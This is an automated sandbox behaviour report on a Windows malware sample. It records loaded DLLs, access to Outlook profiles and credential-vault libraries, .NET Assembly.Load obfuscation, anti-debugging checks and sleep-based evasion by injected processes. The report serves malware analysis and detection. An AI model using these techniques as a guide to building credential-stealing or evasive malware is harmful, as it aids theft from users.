                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Section loaded: dwrite.dll
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Section loaded: mswsock.dll
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Section loaded: dnsapi.dll
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: edgegdi.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\cacls.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Pp7OXMFwqhXKx5Y.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Pp7OXMFwqhXKx5Y.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cacls.pdbGCTL source: Pp7OXMFwqhXKx5Y.exe, 00000002.00000002.179230808356.0000000001008000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cacls.pdb source: Pp7OXMFwqhXKx5Y.exe, 00000002.00000002.179230808356.0000000001008000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: Pp7OXMFwqhXKx5Y.exe, 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179230035520.00000000033BE000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179233863285.0000000003566000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Pp7OXMFwqhXKx5Y.exe, Pp7OXMFwqhXKx5Y.exe, 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179230035520.00000000033BE000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179233863285.0000000003566000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, PYwgDUyCfG3xhOjec2.cs .Net Code: L0mZ2pPbFO System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, PYwgDUyCfG3xhOjec2.cs .Net Code: L0mZ2pPbFO System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.5d50000.3.raw.unpack, L2.cs .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: 0_2_0193EF23 push esp; iretd 0_2_0193EF29
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: 0_2_0193EF20 pushad ; iretd 0_2_0193EF21
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: 2_2_00414970 push ds; retf 2_2_00414996
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: 2_2_00419109 push cs; ret 2_2_0041910B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: 2_2_0040C1FF pushad ; iretd 2_2_0040C202
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: 2_2_0041F19B pushfd ; ret 2_2_0041F1B3
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: 2_2_004149BC push ds; iretd 2_2_004149CE
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: 2_2_00402215 push es; retf 2_2_00402217
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: 2_2_0040AB40 push es; ret 2_2_0040AB41
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: 2_2_0041844F push esp; retf 2_2_00418456
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: 2_2_00403460 push eax; ret 2_2_00403462
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: 2_2_0041A5EB pushfd ; iretd 2_2_0041A62B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: 2_2_0041A5F3 pushfd ; iretd 2_2_0041A62B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: 2_2_00417E58 push ecx; retf 2_2_00417E59
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: 2_2_00418F48 push cs; iretd 2_2_00418F4D
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: 2_2_0041577D push eax; iretd 2_2_004157A8
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: 2_2_0040671F pushad ; iretd 2_2_00406720
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: 2_2_014A08CD push ecx; mov dword ptr [esp], ecx 2_2_014A08D6
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_03515FC5 push ebx; iretd 3_2_03515FC6
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_03516E33 push edi; ret 3_2_03516E34
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_035122E6 push ss; ret 3_2_035122EA
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_0350C036 push ecx; retf 3_2_0350C038
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_03DC87C3 push edi; ret 3_2_03DC87C4
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_03DBD9C6 push ecx; retf 3_2_03DBD9C8
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_03DC7955 push ebx; iretd 3_2_03DC7956
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_03DC3C76 push ss; ret 3_2_03DC3C7A
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_037121AD pushad ; retf 0004h 4_2_0371223F
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_037408CD push ecx; mov dword ptr [esp], ecx 4_2_037408D6
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_037197A1 push es; iretd 4_2_037197A8
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_035CB2E6 push ss; ret 4_2_035CB2EA
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_035C5036 push ecx; retf 4_2_035C5038
                Source: Pp7OXMFwqhXKx5Y.exe Static PE information: section name: .text entropy: 7.815154891038661
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, CaGHojxoRBOvJGpPTZ.cs High entropy of concatenated method names: 'tYjg5xZfrq', 'KSpg9Ntl9n', 'UICgOQVRFo', 'v4bgxTNLJ6', 'n20gTLkxtx', 'd0sgiQmg71', 'xxHgdg6WlF', 'c1egEddTkg', 'v4dg04tXgB', 'i6ygus1OaI'
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cacls.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara matchFile source: Process Memory Space: Pp7OXMFwqhXKx5Y.exe PID: 5384, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Memory allocated: 1930000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Memory allocated: 3310000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Memory allocated: 3110000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Memory allocated: 7AA0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Memory allocated: 8AA0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Memory allocated: 8C30000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Memory allocated: 9C30000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: 2_2_014E1763 rdtsc
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\cacls.exe Window / User API: threadDelayed 9081
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe API coverage: 0.9 %
                Source: C:\Windows\SysWOW64\cacls.exe API coverage: 1.3 %
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe TID: 4452 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\cacls.exe TID: 2132 Thread sleep count: 121 > 30
                Source: C:\Windows\SysWOW64\cacls.exe TID: 2132 Thread sleep time: -242000s >= -30000s
                Source: C:\Windows\SysWOW64\cacls.exe TID: 2132 Thread sleep count: 9081 > 30
                Source: C:\Windows\SysWOW64\cacls.exe TID: 2132 Thread sleep time: -18162000s >= -30000s
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\cacls.exe Last function: Thread delayed
                Source: firefox.exe, 00000005.00000002.179521144385.00000265A3AF7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll__MP
                Source: RAVCpl64.exe, 00000003.00000002.183784710075.00000000004CF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: cacls.exe, 00000004.00000002.182789173794.0000000003130000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\cacls.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: 2_2_00417823 LdrLoadDll
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CA390 mov eax, dword ptr fs:[00000030h]2_2_014CA390
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CA390 mov eax, dword ptr fs:[00000030h]2_2_014CA390
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CA390 mov eax, dword ptr fs:[00000030h]2_2_014CA390
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0155F38A mov eax, dword ptr fs:[00000030h]2_2_0155F38A
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0151C3B0 mov eax, dword ptr fs:[00000030h]2_2_0151C3B0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A93A6 mov eax, dword ptr fs:[00000030h]2_2_014A93A6
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A93A6 mov eax, dword ptr fs:[00000030h]2_2_014A93A6
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0151D250 mov eax, dword ptr fs:[00000030h]2_2_0151D250
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0151D250 mov ecx, dword ptr fs:[00000030h]2_2_0151D250
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CF24A mov eax, dword ptr fs:[00000030h]2_2_014CF24A
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0155F247 mov eax, dword ptr fs:[00000030h]2_2_0155F247
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0156124C mov eax, dword ptr fs:[00000030h]2_2_0156124C
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0156124C mov eax, dword ptr fs:[00000030h]2_2_0156124C
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0156124C mov eax, dword ptr fs:[00000030h]2_2_0156124C
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0156124C mov eax, dword ptr fs:[00000030h]2_2_0156124C
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0155D270 mov eax, dword ptr fs:[00000030h]2_2_0155D270
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0153327E mov eax, dword ptr fs:[00000030h]2_2_0153327E
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0153327E mov eax, dword ptr fs:[00000030h]2_2_0153327E
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0153327E mov eax, dword ptr fs:[00000030h]2_2_0153327E
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0153327E mov eax, dword ptr fs:[00000030h]2_2_0153327E
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0153327E mov eax, dword ptr fs:[00000030h]2_2_0153327E
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0153327E mov eax, dword ptr fs:[00000030h]2_2_0153327E
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149B273 mov eax, dword ptr fs:[00000030h]2_2_0149B273
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149B273 mov eax, dword ptr fs:[00000030h]2_2_0149B273
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149B273 mov eax, dword ptr fs:[00000030h]2_2_0149B273
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152B214 mov eax, dword ptr fs:[00000030h]2_2_0152B214
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152B214 mov eax, dword ptr fs:[00000030h]2_2_0152B214
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149A200 mov eax, dword ptr fs:[00000030h]2_2_0149A200
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149821B mov eax, dword ptr fs:[00000030h]2_2_0149821B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DA22B mov eax, dword ptr fs:[00000030h]2_2_014DA22B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DA22B mov eax, dword ptr fs:[00000030h]2_2_014DA22B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DA22B mov eax, dword ptr fs:[00000030h]2_2_014DA22B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01520227 mov eax, dword ptr fs:[00000030h]2_2_01520227
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01520227 mov eax, dword ptr fs:[00000030h]2_2_01520227
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01520227 mov eax, dword ptr fs:[00000030h]2_2_01520227
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C0230 mov ecx, dword ptr fs:[00000030h]2_2_014C0230
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C32C5 mov eax, dword ptr fs:[00000030h]2_2_014C32C5
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D32C0 mov eax, dword ptr fs:[00000030h]2_2_014D32C0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D32C0 mov eax, dword ptr fs:[00000030h]2_2_014D32C0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015732C9 mov eax, dword ptr fs:[00000030h]2_2_015732C9
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149D2EC mov eax, dword ptr fs:[00000030h]2_2_0149D2EC
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149D2EC mov eax, dword ptr fs:[00000030h]2_2_0149D2EC
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014972E0 mov eax, dword ptr fs:[00000030h]2_2_014972E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AA2E0 mov eax, dword ptr fs:[00000030h]2_2_014AA2E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AA2E0 mov eax, dword ptr fs:[00000030h]2_2_014AA2E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AA2E0 mov eax, dword ptr fs:[00000030h]2_2_014AA2E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AA2E0 mov eax, dword ptr fs:[00000030h]2_2_014AA2E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AA2E0 mov eax, dword ptr fs:[00000030h]2_2_014AA2E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AA2E0 mov eax, dword ptr fs:[00000030h]2_2_014AA2E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A82E0 mov eax, dword ptr fs:[00000030h]2_2_014A82E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A82E0 mov eax, dword ptr fs:[00000030h]2_2_014A82E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A82E0 mov eax, dword ptr fs:[00000030h]2_2_014A82E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A82E0 mov eax, dword ptr fs:[00000030h]2_2_014A82E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B02F9 mov eax, dword ptr fs:[00000030h]2_2_014B02F9
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B02F9 mov eax, dword ptr fs:[00000030h]2_2_014B02F9
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B02F9 mov eax, dword ptr fs:[00000030h]2_2_014B02F9
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B02F9 mov eax, dword ptr fs:[00000030h]2_2_014B02F9
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B02F9 mov eax, dword ptr fs:[00000030h]2_2_014B02F9
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B02F9 mov eax, dword ptr fs:[00000030h]2_2_014B02F9
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B02F9 mov eax, dword ptr fs:[00000030h]2_2_014B02F9
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B02F9 mov eax, dword ptr fs:[00000030h]2_2_014B02F9
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0151E289 mov eax, dword ptr fs:[00000030h]2_2_0151E289
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A7290 mov eax, dword ptr fs:[00000030h]2_2_014A7290
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A7290 mov eax, dword ptr fs:[00000030h]2_2_014A7290
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A7290 mov eax, dword ptr fs:[00000030h]2_2_014A7290
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C42AF mov eax, dword ptr fs:[00000030h]2_2_014C42AF
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C42AF mov eax, dword ptr fs:[00000030h]2_2_014C42AF
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014992AF mov eax, dword ptr fs:[00000030h]2_2_014992AF
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0157B2BC mov eax, dword ptr fs:[00000030h]2_2_0157B2BC
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0157B2BC mov eax, dword ptr fs:[00000030h]2_2_0157B2BC
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0157B2BC mov eax, dword ptr fs:[00000030h]2_2_0157B2BC
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0157B2BC mov eax, dword ptr fs:[00000030h]2_2_0157B2BC
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149C2B0 mov ecx, dword ptr fs:[00000030h]2_2_0149C2B0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0155F2AE mov eax, dword ptr fs:[00000030h]2_2_0155F2AE
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015692AB mov eax, dword ptr fs:[00000030h]2_2_015692AB
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0156A553 mov eax, dword ptr fs:[00000030h]2_2_0156A553
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A254C mov eax, dword ptr fs:[00000030h]2_2_014A254C
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0157B55F mov eax, dword ptr fs:[00000030h]2_2_0157B55F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0157B55F mov eax, dword ptr fs:[00000030h]2_2_0157B55F
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014BE547 mov eax, dword ptr fs:[00000030h]2_2_014BE547
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D6540 mov eax, dword ptr fs:[00000030h]2_2_014D6540
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D8540 mov eax, dword ptr fs:[00000030h]2_2_014D8540
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014BC560 mov eax, dword ptr fs:[00000030h]2_2_014BC560
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01529567 mov eax, dword ptr fs:[00000030h]2_2_01529567
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DC50D mov eax, dword ptr fs:[00000030h]2_2_014DC50D
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DC50D mov eax, dword ptr fs:[00000030h]2_2_014DC50D
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A2500 mov eax, dword ptr fs:[00000030h]2_2_014A2500
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CE507 mov eax, dword ptr fs:[00000030h]2_2_014CE507
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CE507 mov eax, dword ptr fs:[00000030h]2_2_014CE507
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CE507 mov eax, dword ptr fs:[00000030h]2_2_014CE507
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CE507 mov eax, dword ptr fs:[00000030h]2_2_014CE507
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CE507 mov eax, dword ptr fs:[00000030h]2_2_014CE507
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CE507 mov eax, dword ptr fs:[00000030h]2_2_014CE507
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CE507 mov eax, dword ptr fs:[00000030h]2_2_014CE507
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CE507 mov eax, dword ptr fs:[00000030h]2_2_014CE507
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149B502 mov eax, dword ptr fs:[00000030h]2_2_0149B502
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152C51D mov eax, dword ptr fs:[00000030h]2_2_0152C51D
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154F51B mov eax, dword ptr fs:[00000030h]2_2_0154F51B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154F51B mov eax, dword ptr fs:[00000030h]2_2_0154F51B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154F51B mov eax, dword ptr fs:[00000030h]2_2_0154F51B
